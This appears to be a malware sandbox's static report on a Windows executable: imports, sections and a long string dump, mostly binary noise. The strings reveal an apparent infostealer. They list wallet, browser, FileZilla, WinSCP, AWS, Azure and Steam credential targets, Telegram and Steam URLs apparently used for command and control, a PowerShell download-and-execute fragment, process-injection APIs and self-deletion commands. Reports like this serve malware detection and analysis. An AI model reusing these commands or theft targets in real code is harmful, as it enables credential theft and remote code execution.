Static | ZeroBOX

PE Compile Time

2024-07-02 21:27:18

PE Imphash

14b0ac3afcc0fd8a741f8eb3917d4d03

Sections

Name Virtual Address Virtual Size Size of Raw Data Entropy
.text 0x00001000 0x000238d7 0x00023a00 6.09853842636
.rdata 0x00025000 0x00008db2 0x00008e00 5.81647052417
.data 0x0002e000 0x002145c8 0x00002600 4.46202446195
.reloc 0x00243000 0x000046dc 0x00004800 4.48336313182

Imports

Library msvcrt.dll:
0x425154 wcslen
0x425158 memcmp
0x42515c strlen
0x425160 ??_U@YAPAXI@Z
0x425164 srand
0x425168 rand
0x42516c strncpy
0x425170 malloc
0x425174 _wtoi64
0x425178 atexit
0x42517c memchr
0x425180 ??_V@YAXPAX@Z
0x425184 __CxxFrameHandler3
0x425188 memmove
0x42518c strtok_s
0x425190 strchr
0x425194 strcpy_s
0x425198 memcpy
0x42519c memset
Library KERNEL32.dll:
0x425014 MultiByteToWideChar
0x425018 LCMapStringW
0x42501c WideCharToMultiByte
0x425020 IsValidCodePage
0x425024 GetOEMCP
0x425028 GetACP
0x42502c ExitProcess
0x425030 GetCurrentProcess
0x425034 LocalAlloc
0x425038 lstrlenA
0x42503c HeapFree
0x425040 ReadProcessMemory
0x425044 VirtualQueryEx
0x425048 OpenProcess
0x42504c HeapAlloc
0x425050 GetProcessHeap
0x425054 GetStringTypeW
0x42505c CloseHandle
0x425060 CreateProcessA
0x425064 GetDriveTypeA
0x42506c WaitForSingleObject
0x425070 CreateThread
0x425074 CreateDirectoryA
0x425078 GetProcAddress
0x42507c LoadLibraryA
0x425080 lstrlenW
0x425084 ReadFile
0x425088 SetFilePointer
0x42508c GetFileSize
0x425094 MapViewOfFile
0x425098 CreateFileMappingA
0x42509c CreateFileA
0x4250a0 WriteFile
0x4250a8 GetLocalTime
0x4250ac GetTickCount
0x4250b0 lstrcatA
0x4250b4 lstrcpyA
0x4250b8 GetCPInfo
0x4250bc GetComputerNameA
0x4250c0 LoadLibraryW
0x4250c8 GetCurrentThreadId
0x4250cc SetLastError
0x4250d4 TlsSetValue
0x4250d8 TlsGetValue
0x4250dc GetModuleFileNameW
0x4250e0 RaiseException
0x4250e4 GetLastError
0x4250f0 IsDebuggerPresent
0x4250f4 EncodePointer
0x4250f8 DecodePointer
0x4250fc TerminateProcess
0x42510c RtlUnwind
0x425110 GetModuleHandleW
0x425114 Sleep
0x425118 GetStdHandle
Library USER32.dll:
0x425144 CharToOemA
0x425148 GetDesktopWindow
0x42514c wsprintfW
Library ADVAPI32.dll:
0x425000 GetUserNameA
0x425004 RegOpenKeyExA
0x425008 RegGetValueA
Library SHELL32.dll:
0x425134 SHFileOperationA
Library ole32.dll:
0x4251a8 CoInitializeEx
0x4251ac CoSetProxyBlanket
0x4251b0 CoCreateInstance
Library OLEAUT32.dll:
0x425120 SysAllocString
0x425124 VariantInit
0x425128 VariantClear
0x42512c SysFreeString
Library SHLWAPI.dll:
0x42513c None

!This program cannot be run in DOS mode.
`.rdata
@.data
.reloc
jthpnB
jhHmB
j,hDjB
j,h\gB
j3h fB
j{hXaB
jYhx`B
jWhP^B
j0htYB
j$h8XB
@p;Att
URPQQh0!B
^SSSSS
;t$,v-
UQPXY]Y[
t"SS9] u
PPPPPPPP
PPPPPPPP
\Monero\wallet.keys
SOFTWARE\monero-project\monero-core
wallet_path
d2e09041336e6342825973ff413879b9
https://t.me/bu77un
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.1) Gecko/20100101 Firefox/128.1
https://steamcommunity.com/profiles/76561199730044335
sqlt.dll
sqlite3.dll
<0wh+Lec-9
5TEXMC9JFEL
QM47P4O
XS0JM1K
B0ZX0V
O-*(b~DQF#
DQ8LXM43304F
91VJ+)7='%
C_,&5%
JQAFHDKOWW98FHCTHKN10OCFV
@*4)7!
3YWHYG
K;#Mj84!VUc)
"=8",u
L9BS99LFH827FIKSYPU4
g="=* $v
5XNXKSA2F
T8VBQFHOYOIFZ
1SR,5t
NC63XP0DD
YH6UFU1ISD5N
X7Q*_y=Z.
6C5F3WY6B
4JHQC1BXO4P
;;&&`p
NHCTSB7B0U
5535EHNQR
2UES1,
S132AE2PEW0D
g/G-15`(73
:]"a<#'
4V4YTX4AZVJYSS1G5UNB
6Y2GUP36POWJ9
SVHYIIACF0E4XR856DLO
B=2+E+
2NFIF0RQN6X
Y:A1.T_x
5I5CB119
<$rLE'',3f68U76#
PYP197UBBG6DW6REP
A_R#%<y#Y?
KCJB301FVO1F8O
^>8E-7.s
2ML7NGW2
+/BG 9}5>2
C5YNDB22TEK3TSWP
VYSSOI3C3
e(%E!;$
3AW1TZHUSC55
!K (+pV>'
ZYYFX8TMF98XH
;C8-"9p0#]
JR1LXCU6BF8
.$L0U$p]9"0tA
AGV8E4H11UMS19MEZE
0_*>6
07EE359VU9KKZTZIGENM
\X:'|&^>4R
M07IB4G0ZX7
(5$6T|5&]=
OZPEB19CC3IC
GZD7OW3LV7
)>7+4S7
EMCYW2CP
Q3=S<5
ID6FU8QO2NLA
4("\?J
RFEIIFGJPLP9L9
AVAI4Z1EK55HX1Z
:-?5(\C!7%{->^
INMPM20IXQUGN9
06NODAY4WYN3PAK0MXEOHYZ5ZLZ049G0V7J7
5?*CV(\
XZY07O9
3W1QQBXM6
u +62=7h
!A2\G:@]^=po6X1"f2"@-ze#$(3m
6OEBWSCELH2B34S441SJOP7COKVC4LAEMEEVP4
1H401M5G
'W0?W%c
oU<&1\#.B%w.;6.g]Q9+bcS>="%X&Odh
RH9DZ9QNAN4M3O8IJE5SO0QXHTDCJ90MJYC1QHLA9T6YE8EX
/4W#N2k&A#8'Tc
WSQEFZ3L9A7U8PLB9P77C9L7BCP
+:!(7:
BA113XY9ADO0RYUFZVWGDVC4Z4M087YUF48LXS
m*x#3?(XL9pe%gpe`
-&>y}<ymFhf
BIXWZRM79MPJQGEEF2ICRYRZYB7HD
ZE'?+S
M-Y)'B
XW36DPY7U9B2LI15C2L
T??=*&B
6MPJYC0S
9;X?A'
JJ4V5B22WFG
7K2I5J3
+[T17820!:
G43XYMAUSI8INX
\&W?/":5!/00D%kO>4
0O5MNPCSNCTU6VE9ZR
'7+$^x ((%*?|
IB1SW0VHYMM97VMZIKFV4VER
8Y(#W}2W/
ZKY5GGWW7NJ0SD3I
%:8."Ux/!W
FUVHK2VYE1
![X28,
MB46TQKX
4478HIN8O
+#@C-><
ZDE44LLYDT801ZLP5WTL
C**+$mt
7EANJWT
,e3v;s
H4DBLJEU8BS
*UU<;!1 m?"^
K66SNOESCGO2
|(855.6
CRXMGEBSF
CJ360H
@;5"+_jY9P)-W2;f<)L
WI5OYMD468Z3FX9FHHHQ8
PG9LIS0C
4QJAR2AU
uv~v{g
Z4EFNFKU
V6KXJQ8U
eZ4A<(E(
*9C$E+U3
/4,7/C
)E)S^X]1egASB/8'*X
$;R[9S2
65R5KI7MQNCZ1K6D3GDXFZHXX08DL6Z2913VE4411VKSO5MXVT42U6AHY3HUK3AUXKZ9RL99ML5TPYJ2NKR2B7HD1
V>F#-@'
! #&A%#=
}__XPR8cy
~@>!V8(
&$'-?-)e
/! +"/
E9X2TL2BHNHCQI2JEII2991376MIL15JM9WCEETKADSHZ9OZULDMDQDEH45W8UZQS8ZRW0EAY816QUD7SWY9XTG
6!=D4:+n
#7=)*?.3z6V3,RDvyj
F<_"!Z
<W ]_='ez76![9.
QYGI3UHN2OJTOFYPHGC5P0ZO7IXI6G3H3MN1LWN8F43XT95BBM4VEZNZ91LV68QVVC0C26DV3EZV6C58NVHUMIC
j]>C;X@(
}!+$9E[3'j
/>+14ow
}F$^?"1
4-$P5R&d
C7"9&<
tffw~zb~}w
92X7L92MO0HHVV64US6TIXBRQ3F4YFE23P2PMZLOFBB9Y7U8E6CNVIWL1GQS48YJVONF3QR4GSNHVB2TJGZ1C1HU2
b'V N40&
-W@[@-!C
}?&(:.8
*].Y?WE
@<*$=<
1H0T9UBCYAD4243BG7BVFYQN7B6GW5A2JRDUASKXX2H0S26MF5HFKRWD1MV8Y5P3AKVL1IAXXN8NQZ5EFTB1X5S15
!WEBS>Pe
Z;85#=53
aZ\7W@6
2; +,F
4K)![!lg*)#?12
{4@GRTYX3x
95<K>;?(
:9Q,$"0
D<%$#*
wxr{un
VN1152L59T3XJZPRSGW632S87E61HNIGIRNB2OQ9ZH4O00CGGPFA66Q343306TXVLWO2MOZEZXHV7EHGCZV1HIKLAUG8VZCFTJDELJ410BKIZ460VXYG86NDLC2
f6E*0;@.
6W6YGT2J
f+)&(B#]
2NECO0B0
~laqlq
8TYAZ5AYRO65WRSLQ
VR7NX7ZFI5KCLUZ9C
CX15HK4IXMZC67DCM
AGQ66G57F0W7TOWO2
1K6QE9UBS
e)& 7J*9i
=@'F7<
Y1LJEP8KTISX3L2XLD
BX0W4PmY)5]U2R
WV6B6B8M67B6S515LC89V0
;?D;=-
\=E+*R!k
MB042CDOOP6ZZHF0X3NF6C7K6ST551
/-)*:1S
AKDZIUC7I
U9GX4JID
U9QIP4TNKH9H9RS39
PIPMIZLL6C9NVU
KK6JFA1MECD
ZCKDCZULOSB5H
U3MUJSSKDIWTVL
ROYQ5YWZA
XY17WM884
A.SDLp
0172Z268P
GOINHX
;TF$?9 $"
egk6.Y
M74QQMIIG3QWERB5
9*-A 3&v` X:
JEK5OXHEND4V
7%<zl%))
YVOIBAEE
CDZC45Q49HHL
] 59-/`)^]
M2ZRUXJNM21
?D1"-(vv<<_
Y6TGODEXXP3
v^&5$)7
<3=!X(
27UEHHNZYANH7F
95!"2N
MPFQNS7OPDI
'9 >)("7
3 0^3*
G&@,<>
$ 03>8
9!Y9=7*Y
0CYSDO8VQMNZRQZGDCYSZNT1DYLZ2T2IRJDARCZQVUYWH7JIVF5
$\V155V$
P7.L"-6
GV35TFF9VW1ZKL8PDXG
gA8E(4j
'['&,6
0V&7;?)#os
QZACYXLWZCJVBITQ708UZ48K1MY6TB5STMZPB9ERHLFQ3C
*vwQ~q(
3FS84TDXH3NLR5DTL
4 0>{5\3
ZROPUSJ5T1V
--J"D&%G
.9])?<r
<FG<4;
7K'-+7
0XMMQTDKDQDN8M7IC3QPGW9FHORJFURI45YZOZR9TDDY
GE25M2S0MY9H2
P/T1#<
M1C8TWO
P^5,$77
67GIBXO
R)19^!
1ACV3D
CF''>!5$#W/
34HAWMPW1J9F
|=2 &o
0RQAJOT1KPH
hd%-\!:7")0x$T0.T0S
OXJLC8DBRFMRVH1FK8T1
:2<-:R`1?6P+>3\:
YZNBW7MTGB5EMZ3TW
XN3PKV0
AXJE1DON2UVWP17
$?#+cjA.:.T
WTZQJC95OXB1
'=66&
NNCXNSBWD
0C)'G%%-sf$9;?7PF
TKFK0BH7LI4LJCS5AMOVY75
"B38>PZVs
.M;3) 8
K33J1ONZ6VVM958SHK9OZGGK
:@?;>>
LV5XRPM
5(,(/=m?9'"A,
EDMKJNCLHKK5I
3&C_;'&G)</bDD<Y!#
UI12SNU3FNVL75P0UF
'X^R+Q"o7%-*#1
D719B4QADTACWT
a ?(f~
5*9(+<i
XB4HUWAUMDF8Z7LRPHBMEFXKNOIOIPI0HE2GO
rdz7%U!-?15-
m& -8&q
!,;U&,JE$7N
K1OT10ZQL0MIQPXH1MPAAMCQIJKSO9WHUGCI8NE91KE7
p_?'Cgf/#~:%6x8T:~
1,.9uc#?fVQ-&<ef7IBY"+z
x;,-8S
*\^]X!4
LPSG7HP7PT7KFFP6NQF7V8CR4AMZQYCJL532XTYIFR120PRV80I1T8XMMAM650R0QY9JLXI3161DG
&%B. !5,
8C$G %3
EHF0WPUPHMY0W0OWW
!;13? 23<
7&>%V%
DURAFPFVXCDCLK7HE
#863_UX6
VKSA145SJKXBE
P-04c9+##%a
6BBY0LINJQ4Y1
.[4!40~R4;$
B4SHZCP8GTJ
x*$3:=/
0CWGUOV
!4zp51'
QDVZ4TEF
CCX5Z6WKKU
* 3YV"
VEOX03Q
T70TPN
U71UNW
_)E0ll
E0G1XVL
EFRHEM
tgi$(=Q
R& /`u+9' K7A]:4
?VZM<~y?+$.EW!<$'f4*W<
:48T;
1,*+K%F$#dv
xW;)#-6i(1;T!
LY0R73IJIP4ZPOA1GRKLUNAWI9V54UZCR949TRYZSTG76UUKI9MO6N88YDJ8INOYZ1IPTBIY2U2AGD0XPKX4ILGDB6KPI0R
MNS8JDVDVJFSFYJ9WT12PM0K9YI1S5H
/7G,<K
BFD3CN2
yO ]C!b
mU85*S^85
SVDX1M4F6I72Y9A16DBEA6CM4MAE57TY
>C /Y#U
VK7OI0O9
:6i_"M4#$],
o'U-"|w:7
@'3A>Vi
?K61%=E
ibhscfzgy
[Y']da('P%(HB2U
/Q::,e0=]!
,?)<9"2
22988X9Q6J6HXBH03SE67V9DLJ1U1OW4YJPWSDW3BP4L3E25Z3FXWX6G26WY6OYRXCSOWVH05L5R1XJHR558J8HAMI3WQ86W1MY0VOIEVO2L2OPFWPGA
s#?\^1K
0LP77T8
3&6YB=
BVRA60V
2VHDHPS
U7$A\>1
J4DW63LU3W
,4&^pw
JCSO0JW
3UXMR2
%A\-'==
U33KNQXEN
j7,.|g
9XJZFG
q\C[0YW
f%$RD=&9S
03/'0|v!/"<$#;
BU/0-d
!9-Z<*
JS1ABVQ312W09PKX35FPW76SGT6QFRCRUPVQNQOSLIDM44CEHD9X1L2MVJ3RY
9%&3]w5CP
2B4ERVBTR03T71O
pPZ7(!0
VQ86LVOL459EQQD
?F#)$=1R#MT
CNBC3KJ2KLJIX1B91
E4G9CAT12WCPZ
X>&4&QZ
6!fX^'
ZPPPVL66S6JCFH06SSX541S
'- 7?&"
YUNOPOXTSPQL
ER3WO0H2
?)$%#9
<*7yg "*
TM5NMFCWBTHYIVPRYDJIDNF
S6067:#!=
6XSDNJWDYG1OU
C6]&D0`m%*]:Y,
0G1O0US2FE1O4BT82JA
>:]>CQ
R\T77\
MK1W748I138BZ2TI1ZA7
G9%1F4
f%&87,
4HIX2Q09FJWDI
K%*"6'
P#;WTX-U
8TFKBB7K6JU681W0
=3Y(M\jmQ74D9<
NB5A99Y22XX1TRA8XON
AF"1.(y
27NXZMJOAL3R
%H&:LRx
46P4(*W
V9JS87KUDD5DIX2FT1
%G.\7"w
V6B5CGDC7D9O
;]d)C&Q#6
E4PU97L0U8LX
KJLKCR6TK
a'kT51<5R*
W0[&<V?8
3J91RXOA7XH2C4SN5ZK
4F6\$=
69TJ8G6PQ5E5KS
8?w3x
L3MPDQ0V0TQJQFAUZ2K9
VYGXBS9S7VRVKG
YECMHUDE
68OQVRU
OESXZ79Z
$$W?7\3
TJP2MY9GE74EKD67N
z8A)$[=>
3V5LV5XJV4T59OY9
17?j+4"2+:
5MGUIARQ8NEWWXNP
UBB 6
HVO2ROZTU037ESBS
8G)A<0F
EV3L3RU2LFSII
%33:!]'{/\0Rq8(= +
KKGVHO8S8C3C79YFYLN
~:=WKY3L
:<ZP41
7TI297V8SUR45WEC
y- .G9(1{<<7
0CTK5WME4LYYDYA7
JV:<8=q.
LGXNVY23YILX4VL
60q][Q3D
HMLSD7275V6Y1Z4F
4&(6,*,0
5I2DWUZVZYXOODFV8U
80,=.y
OQRHJRPN68CIYQLBESI8
;6$fT$6!
A64GUCI05HCDG
.>A7xUO
RRJUBQ2R306
CY1IY82F13PT4
]!]s'4
JI3Q3T08BMR69
N6SDVI1GF27XFPAP
0FBD*W.7
G526C9ZQZ
X5OYLBWKHH
TM$.';0
CEXR14FAFITNZ5EYQZOLY
_+=)6+
.'&-1B
WGIUT6XMEWRBKQONT1Y
AC&'36&^
60VUZXR8H
X794VLISK2C
/<&3^%`+^U\=
BKSWJOMG1U7B013J
82RUXOGNWX5W1
\(YE8L;?
G&<Y*1A
RK7H6EV0QPI0O67Q8SRX5IJ0NT3
T0.3Y,
5XB9CSE1CZA6UIOZ
2E,`+1fAYER$7*
LJRK5X3NE63657VCS
'"<5G=
UFTK14BBANL7I
sr(LG"w;7*'r8$X'>.?]
551P.0F
11Z57V4WXYB3TC7UWZW0WGZG9JU4
A4?Ft?',!%LS
47%P8(:03-
XC3MO23ZIISD86GMZH5LZSSTVT
['.0>$.
50K47F3UC5TZQPGK
&!+5_*]\=]
XIVOBA6K15G8
X/_*5'059>Q
H7I6F1CANQYPD4
K32WWGIKATS2SXQ83WUE4
QAHAIJGLKO9QSHJYUZ8O
KJBAONSE
%XG}++B 11
GA179BX2OBTIW5WJ
FRJFJZHSMQ3CORIQSUCU7
RYI[&#
",FU B"
H6097SPZJY21O5L
wR87^B7k6%&$!A
06QG27D8BDTPT1
FCR9VYQD8SI1GMTM97D4236AZQP
,8|'(><w'47TQ;+
DVSAHIL5JIYY2IWX04IX
pS9'p7L
!%']17E
77PW7R8KCEZFIOFH9TE6XG1D
v' ;2)r[$*/D_3;&
5UEZFL14IZN06QWCP6
P]!-]x;/24=
K51DY87YEWWI
W2ST7L
O1CW4MA1Q5DI
!>=-D% 55
PUC4RCBNSML0LBYPRN8IM0
"J.8D^$6xP^>
P9ZJ03CDV42R
2>4>&a)%'
BMUNOOMIK
CYS9*p
016UFC5BZ5Z
1,.6TA'{2-X
BDBA51NUVA4
8Z9'6"%`*-;
O3WNXGQNNAW
)PF:H:g*/=
K34C8NINCQ
.]&gkvWU
A1CTYX39L
(]/C<B97]#
O9F3P7J1S1O
-F{@A%W!A
#+)<*C
VH2853W2O5TQDJYY0DG
5*?]Y8&(
1;9004
DPXR47YRMFCTZUCG
($V2K4
380MEZK5W8G
KK4WXXMW0DY
63I5EUV7KWNV6V3UTKY
P3JK6ZMI94
6BANGG0HBTT01S2A0J4
.;7>6F**
BHCLU6SDF
QW7X2TLDXNDK
]):)+6
K?[+0<^D~6_V=="3;_^}3
9MVV2NSJJZB9P8NCO167X99OPCGR008K
$K022&gJY@'P-
WM9DGSJ7864B3Y
JL69NFEQF
-%)~:$%$
NDKM8SVVPOZX3M
{E6/=Tr$=1t
87SNI14MQT5
69LKDHN37
*"!%U=
JDVKRRPJEKOQ0O
1GLIJQMS
9U$g<
WG6WP9A4UZEDU
ADFPCDW76N
9B$:Y" ,0cYB*(+"=
0YKUW4MH6LMEBD580CIINXC
t#&#z8:C=
2JHG9TU0X
AV4H2VQQZ
27YJKVQREK7U7
AQ50YCPFJSQ
0IXG29G1MUSWRS23JL
RW;;+:
87MMYELD71ZNGN3KEIK8EJXC
O8HUE4QIPN110C
;![67$bfr] K!
PIN8SDWQT44R8U
).;\P"2J
&1*A8F:
LLZHR24ME9ZITTI5W4CE
w/Cd949;1
?'%$*SL.^$q
0J72VXLVTMQAJVG28G1J0
<9-*F#=<8
R2OP0PA20PSNHXL2BIIK
>?<k+, yZ'<+Z L8\$
4YUNWRY1DBE04ASY7A8Q3J
"3?1 =
BTPX3KQMPRD
Y$9\b*^.
AQCM6GX06C3K
G+QQKF|{
N5D2485OILIC4
6[5!+*
66CME90LD4VDXY
?.&YT4Efs
ZXH!8#'
LSFW3EGPAJ11X5UAE498RPLS
Y'Q%Tg88V
F5H3D84QB3
7V3LGAKH5IX
JGH7V1EX
PB9IZKTFB2
9#J\6@?V4r
JSWCLYWOMW85T5K3G3
:/,K]!:Q]0
#5(XT#P
RIOFTYE92OW43DGBGA96O5Q
build_id
------
file_data
------
status
task_id
"encrypted_key":"
passwords.txt
SELECT target_path, tab_url from downloads
Downloads
AccountId
SELECT service, encrypted_token FROM token_service
GoogleAccounts
Google Chrome
\BraveWallet\Preferences
Preferences
Opera GX
Opera Crypto
%s\*.*
.metadata-v2
\storage\default\
moz-extension+++
^userContextId=4294967295
prefs.js
0123456789ABCDEF
Password:
Password
UserName
Login:
PortNumber
HostName
Host:
Soft: WinSCP
Software\Martin Prikryl\WinSCP 2\Sessions
Security
UseMasterPassword
Software\Martin Prikryl\WinSCP 2\Configuration
Login:
Soft: FileZilla
<Pass encoding="base64">
<User>
<Port>
<Host>
\AppData\Roaming\FileZilla\recentservers.xml
firefox
Stable\
string too long
invalid string position
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-_.
N0ZWFt
65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
steam.exe
Windows 11
CurrentBuildNumber
MachineGuid
SOFTWARE\Microsoft\Cryptography
Unknown
ZG:%d/%d/%d %d:%d:%d
C:\Windows\system32\rundll32.exe
C:\ProgramData\
C:\Program Files (x86)\Internet Explorer\ielowutil.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
-nop -c "iex(New-Object Net.WebClient).DownloadString('
information.txt
[Software]
[Processes]
VideoCard:
Threads:
Cores:
Processor:
[Hardware]
TimeZone:
Local Time:
Keyboard Languages:
Display Resolution:
User Name:
Computer Name:
Install Date:
Windows:
Work Dir: In memory
Path:
HWID:
GUID:
MachineID:
Date:
Version:
%s\%s\%s
%DRIVE_FIXED%
%DRIVE_REMOVABLE%
*%DRIVE_REMOVABLE%*
*%DRIVE_FIXED%*
msal.cache
Azure\.IdentityService
\.IdentityService\
Azure\.aws
\.aws\
Azure\.azure
\.azure\
Soft\Steam\steam_tokens.txt
_DEBUG.zip
http://
/c timeout /t 10 & rd /s /q "C:\ProgramData\
" & exit
" & rd /s /q "C:\ProgramData\
/c timeout /t 10 & del /f /q "
GetSystemTime
kernel32.dll
SymMatchString
InternetSetOptionA
HttpQueryInfoA
dbghelp.dll
SetThreadContext
WriteProcessMemory
ResumeThread
VirtualAllocEx
ReadProcessMemory
GetThreadContext
CreateProcessA
Qkkbal
ZG:XA
ZG:c=
Unknown exception
Complete Object Locator'
Class Hierarchy Descriptor'
Base Class Array'
Base Class Descriptor at (
Type Descriptor'
`local static thread guard'
`managed vector copy constructor iterator'
`vector vbase copy constructor iterator'
`vector copy constructor iterator'
`dynamic atexit destructor for '
`dynamic initializer for '
`eh vector vbase copy constructor iterator'
`eh vector copy constructor iterator'
`managed vector destructor iterator'
`managed vector constructor iterator'
`placement delete[] closure'
`placement delete closure'
`omni callsig'
delete[]
new[]
`local vftable constructor closure'
`local vftable'
`udt returning'
`copy constructor closure'
`eh vector vbase constructor iterator'
`eh vector destructor iterator'
`eh vector constructor iterator'
`virtual displacement map'
`vector vbase constructor iterator'
`vector destructor iterator'
`vector constructor iterator'
`scalar deleting destructor'
`default constructor closure'
`vector deleting destructor'
`vbase destructor'
`string'
`local static guard'
`typeof'
`vcall'
`vbtable'
`vftable'
operator
delete
__unaligned
__restrict
__ptr64
__eabi
__clrcall
__fastcall
__thiscall
__stdcall
__pascal
__cdecl
__based(
CorExitProcess
GetProcessWindowStation
GetUserObjectInformationW
GetLastActivePopup
GetActiveWindow
MessageBoxW
HH:mm:ss
dddd, MMMM dd, yyyy
MM/dd/yy
December
November
October
September
August
February
January
Saturday
Friday
Thursday
Wednesday
Tuesday
Monday
Sunday
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
memset
memcmp
strlen
wcslen
??_U@YAPAXI@Z
memcpy
strcpy_s
strchr
strtok_s
memmove
__CxxFrameHandler3
??_V@YAXPAX@Z
memchr
atexit
_wtoi64
malloc
strncpy
msvcrt.dll
ExitProcess
GetCurrentProcess
LocalAlloc
lstrlenA
HeapFree
ReadProcessMemory
VirtualQueryEx
OpenProcess
HeapAlloc
GetProcessHeap
GetComputerNameA
FileTimeToSystemTime
CloseHandle
CreateProcessA
GetDriveTypeA
GetLogicalDriveStringsA
WaitForSingleObject
CreateThread
CreateDirectoryA
GetProcAddress
LoadLibraryA
lstrlenW
ReadFile
SetFilePointer
GetFileSize
GetFileInformationByHandle
MapViewOfFile
CreateFileMappingA
CreateFileA
WriteFile
SystemTimeToFileTime
GetLocalTime
GetTickCount
lstrcatA
lstrcpyA
KERNEL32.dll
CharToOemA
wsprintfW
GetDesktopWindow
USER32.dll
RegGetValueA
RegOpenKeyExA
GetUserNameA
GetCurrentHwProfileA
ADVAPI32.dll
SHFileOperationA
SHELL32.dll
CoCreateInstance
CoSetProxyBlanket
CoInitializeSecurity
CoInitializeEx
ole32.dll
OLEAUT32.dll
SHLWAPI.dll
RaiseException
GetLastError
UnhandledExceptionFilter
SetUnhandledExceptionFilter
IsDebuggerPresent
EncodePointer
DecodePointer
TerminateProcess
InitializeCriticalSectionAndSpinCount
LeaveCriticalSection
EnterCriticalSection
RtlUnwind
GetModuleHandleW
GetStdHandle
GetModuleFileNameW
TlsGetValue
TlsSetValue
InterlockedIncrement
SetLastError
GetCurrentThreadId
InterlockedDecrement
LoadLibraryW
GetCPInfo
GetACP
GetOEMCP
IsValidCodePage
WideCharToMultiByte
LCMapStringW
MultiByteToWideChar
GetStringTypeW
.?AVbad_alloc@std@@
.?AVexception@std@@
!This program cannot be run in DOS mode.
`.pdata
HTTP/1.1
SHELL32.DLL
ExitProcess
CommandLineToArgvW
GetCommandLineW
GetProcAddress
LoadLibraryA
KERNEL32.DLL
StrCmpCA
InternetCloseHandle
InternetReadFile
HttpQueryInfoA
HttpSendRequestA
InternetSetOptionA
HttpOpenRequestA
InternetConnectA
InternetOpenA
InternetCrackUrlA
SHLWAPI.DLL
WININET.DLL
ResumeThread
SetThreadContext
WriteProcessMemory
VirtualAllocEx
TerminateProcess
GetThreadContext
CreateProcessW
GetModuleFileNameW
lstrlenA
GetProcessHeap
HeapAlloc
WideCharToMultiByte
lstrlenW
UVWATAUAVAWH
A_A^A]A\_^]
D$hffff
Icl$<I
IcD$<H
|$ ATH
memset
memcpy
msvcrt.dll
GetProcAddress
LoadLibraryA
KERNEL32.dll
.?AVtype_info@@
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
.?AVlogic_error@std@@
.?AVlength_error@std@@
.?AVout_of_range@std@@
1!1&161C1
2M4Z4e5|5
717K7b7
:6;J;m;
;&<6<M<Z<$=L=d=
0"0/0O0h0
2'2r2|2
3(3?3D3Q3X3]3j3q3v3
4 4%42494>4K4R4W4d4k4p4}4
55,53585E5L5Q5^5e5j5w5~5
6&6-626?6F6K6X6_6d6q6x6}6
7 7-727?7F7K7X7_7d7q7x7}7
8 8'8,898@8E8R8Y8^8k8r8w8
9!9&939:9?9L9S9X9e9l9q9~9
: :-:4:9:F:M:R:_:f:k:x:
;';.;3;@;G;L;Y;`;e;r;y;~;
<!<(<-<:<A<F<S<Z<_<l<s<x<
="='=4=;=@=M=T=Y=f=m=r=
>!>.>5>:>G>N>S>`>g>l>y>
?(?/?4?A?H?M?Z?a?f?s?z?
0"0)0.0;0B0G0T0[0`0m0t0y0
1#1(151<1A1N1U1Z1g1n1s1
2"2/262;2H2O2T2a2h2m2z2
3)30353B3I3N3[3b3g3t3{3
4#4*4/4<4C4H4U4\4a4n4u4z4
5$5)565=5B5O5V5[5h5o5t5
6#60676<6I6P6U6b6i6n6{6
7*71767C7J7O7\7c7h7u7|7
8$8+808=8D8I8V8]8b8o8v8{8
9%9*979>9C9P9W9\9i9p9u9
::$:1:8:=:J:Q:V:c:j:o:|:
;+;2;7;D;K;P;];d;i;v;};
<%<,<1<><E<J<W<^<c<p<w<|<
==&=+=8=?=D=Q=X=]=j=q=v=
> >%>2>9>>>K>R>W>d>k>p>}>
??,?3?8?E?L?Q?^?e?j?w?~?
0&0-020?0F0K0X0_0d0q0x0}0
1 1'1,191@1E1R1Y1^1k1r1w1
2!2&232H2n2y2
3>4N4[4h4u4
5.6o6x6
9::Q:Z:$;+;V;c;o;
<:<K<v<
'0o0x0
4!5I5{5
66I6\6
9(959B9a9n9w9
:9;B;N;
>-?>?N?U?j?
0c0o0x0
1+2O2s2
6#606=6\6i6r6
748=8I8
?)?P?c?
9W:0<?<E<T<Z<i<o<~<
=+=J=p=
=>3>g>
?0?5?@?b?
0/1g1u1
2"2*232@2U2
3"3(343:3@3L3R3[3d3m3v3
5)575l5
6!6&6/656>6P6U6^6c6l6
7L7`7p7
;/;?;T;d;q;
</<4<=<O<T<]<o<t<}<
>$?<?E?U?f?{?
1?2W2`2p2
324I4Z4c4
5%5:5e5
7*8B8K8[8l8
9&:N:g:u:
;$<;<L<U<
>/>8>z>
0E1W1e1q1~1
3&333[3s3
6p758G8
>$>->I>R>d>m>
?*?/?8?>?I?U?^?p?y?
1?1M1u1
1@2X2a2y2
3%353J3Z3g3|3
4&4+444F4K4T4f4k4t4
4%5/5?5
5;6`6n6
697Q7Z7j7{7
9:-:D:[:h:
;);:;K;
;8<B<R<
=C=P=Y=f=t=
6&7i7v7
8 858D8Y8h8
;;+;E;
0G0P0i1
7&737A7_7
;$;><R<
7/71888R8Y8b8
99&9/9y9
9<:C:x:
;/;6;D;u;
<$<3<:<T<[<d<
=0=7=@=
040T0e0p0
6)6Z6c6p6
8,818:8?8H8Z8_8h8m8v8
7.8<8q8
:!:M:V:^:g:
; ;+;@;I;R;q;x;
</<6<M<V<r<y<
="=;=[=s=
?0?8?E?
@0M0_0{0
364G4t4
4'5X5^5l5z5
6/6;6G6[6v6
8W8b8r8
969?9W9k9
::*:g:n:
;#;;;E;8<?<O<V<
=$=0===D=L=W=^=l=z=
?%?,?7?@?]?
L0a0h0
2)2K2Z2{2
2N3W3`3i3r3~3
404L4Y4h4
8!858R8]8
